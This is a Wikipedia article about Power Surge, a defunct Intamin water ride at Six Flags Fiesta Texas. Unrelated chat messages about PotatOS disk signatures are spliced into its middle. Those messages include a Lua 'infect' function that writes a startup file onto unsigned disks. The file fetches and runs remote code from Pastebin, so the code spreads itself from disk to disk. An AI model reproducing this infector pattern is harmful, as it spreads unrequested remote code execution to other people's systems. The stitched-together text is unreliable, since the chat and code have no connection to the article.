Power Surge (water ride)

Power Surge was a shoot-the-chutes water attraction designed by Intamin located at Six Flags Fiesta Texas in San Antonio, Texas that opened with the park on March 14, 1992. In mid-July 2017, park officials announced that it would retire on July 23.[1][2][3] Safety issues was not a factor in removing the ride. The ride closed permanently on July 23, 2017.

Power Surge
Six Flags Fiesta Texas
AreaRockville
StatusRemoved
Opening dateMarch 14, 1992 (March 14, 1992)
Closing dateJuly 23, 2017 (July 23, 2017)
Replaced byWonder Woman Golden Lasso Coaster
General statistics
TypeShoot the Chute
ManufacturerIntamin
ModelShoot the Chute
Height50 ft (15 m)
Length808 ft (246 m)
Speed36 mph (58 km/h)
Duration2:34
Height restriction42 in (107 cm)

On August 3, 2017, it was announced that the ride would be replaced with a new roller coaster named Wonder Woman Golden Lasso Coaster. It is the first single rail coaster built by Rocky Mountain Construction, and opened in March 2018.[4]

Ride

Nestled along quarry wall that overlooks the Rockville area of the park, Power Surge transported a dozen riders at a time along a channel against an old power plant backdrop. It ended in a steep 50 feet (15 m) plunge, with a double-dip going 36 miles per hour (58 km/h).[3] It operated each year from opening day to Fright Fest.

The ride was featured in the 1992 movie, Blank Check, where Preston Waters (Brian Bonsall) watches the boat coming down the drop while on the bridge, then gets soaked with his cotton candy by the boat splashing down.[3]

gollark: If you have the private key, you can generate signatures for any startup. You don't, though. The stuff written onto disks *also* has a UUID embedded (on the more complex ones), which is part of the signed bit.
gollark: The signatures are programatically generated from the contents of the file and my private key. PotatOS has the *public* key, so it can verify that the signature was generated from the corresponding private key.
gollark: Um, no, that's not how it works.
gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```

References

  1. "Six Flags Fiesta Texas Retires the Power Surge this Weekend". San Antonio Current. July 18, 2017. Retrieved July 23, 2017.
  2. "Six Flags Fiesta Texas original ride to close this weekend". Kens5. July 19, 2017. Retrieved July 23, 2017.
  3. "Six Flags Fiesta Texas retiring a classic ride Sunday". San Francisco Chronicle. July 18, 2017. Retrieved July 23, 2017.
  4. Levine, Arthur (August 3, 2017). "Exclusive: Six Flags to debut single-rail Wonder Woman coaster". USA Today. Retrieved August 3, 2017.


This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.